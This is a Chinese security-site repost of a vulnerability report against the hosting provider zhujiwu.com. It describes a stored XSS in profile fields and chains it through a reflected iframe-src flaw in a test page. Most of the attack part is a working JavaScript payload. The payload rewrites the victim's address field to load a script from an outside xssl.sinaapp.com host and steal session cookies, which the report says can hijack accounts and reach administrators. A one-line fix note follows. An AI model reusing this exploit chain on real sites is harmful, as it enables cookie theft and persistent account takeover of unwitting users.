頻道欄目
首頁 > 資訊 > 網站安全 > 正文

主機屋XSS回旋鏢--自插點的利用

13-12-24        來源:[db:作者]  
收藏   我要投稿
主機屋自插點的利用,這樣子的利用可以過了吧。
 
主機屋會員中心個人信息
 
詳細地址
 
聯系人
 
QQ處都存在存儲型XSS
插入語句
 
"><img src=1 onerror=alert(/xss/)><input type=:hidden
 
 
 
本來是一個自插的點,查找并沒有發現越權修改個人信息的地方(@小川),本來以為就是個雞肋。
 
找著找著,發現這么個地址
 
http://www.zhujiwu.com/test/test.asp
 
貌似是檢查白名單的地方,真不知道這個URL到底干嘛用的。
 
插入的url參數直接帶入了iframe框架src
 
簡直是白送的XSS,這樣就可以從這跳躍到自插的位置了。
 
于是我們構造javascript
 
 
<meta charset="utf8">

<script lnaguage="javascript">

    function createRequest(){

        var xmlHttp=false;

    if(window.XMLHttpRequest){

        xmlHttp = new XMLHttpRequest();

    }else if(window.ActiveXObject){

        try{

            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");

        }catch(error1){

            try{

                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");

            }catch(error2){

                xmlHttp = false;

            }

        }

    }

        return xmlHttp;

    }

    var getAddress;

    if(getAddress=createRequest()){

        getAddress.open("GET","/member/account/basic.asp");

        getAddress.onreadystatechange=updatePage;

        getAddress.send(null);    

    }

    var xml;

    function updatePage()

    {

        if(getAddress.readyState == 4 )

        {

            if(getAddress.status == 200)

            {

                var str = getAddress.responseText;

                rex = /name="Address" value="(.*)" size="38"/;

                var ttt = rex.exec(str);

                if(xml=createRequest()){

                    xml.open("POST","/cmd/member/setBasic.asp?cmd=set");

                    xml.onreadystatechange = attack;

                    var body = "areaID=0&provinceID=1&cityID=1&Address="+encodeURI(ttt[1])+"%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxssl.sinaapp.com%2F0S3c9D%3F1383890465%3E%3C%2Fscript%3E%3Cinput%20type%3D%22hidden&=&LinkMan=asdf&Tel=12345789&QQ=123456789&=%E4%BF%9D%E5%AD%98%E4%BF%AE%E6%94%B9&";

                    xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");

                    xml.send(body);                

                }

            }else if(getAddress.status==404){

                alert("404");

            }else {

                alert("status:"+getAddress.statusText);

            }

        }

    }

    function attack(){

        if(xml.readyState == 4 ){

            if(xml.status == 200){                

            }

        }

    }

</script>

 

 
能夠獲取當前詳細地址,再插入自己的代碼,當成偽裝了。
 
 
 
主機屋并沒有HTTPonly
 
 
 
演示最后的過程
 
 
 
發送我們訪問的地址:
 
http://www.zhujiwu.com/test/test.asp?url=xxxxx.sinaapp.com/xxxx.html
 
不能暴露sae地址,類似這樣的地址。
 
 
 
原始頁面:
 
 
訪問url后:
 
 
 
收到的cookie
 
 




個人信息能看到的人還是很多的,比如管理員!
 
 
 
這樣偽裝還能永久劫持個人用戶!
 
 
 
如上!
修復方案:
編碼輸出那三個位置就可以了!
相關TAG標簽
上一篇:臺積電:絕大多數7nm客戶都會轉向6nm_IT新聞_博客園
下一篇:最后一頁
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片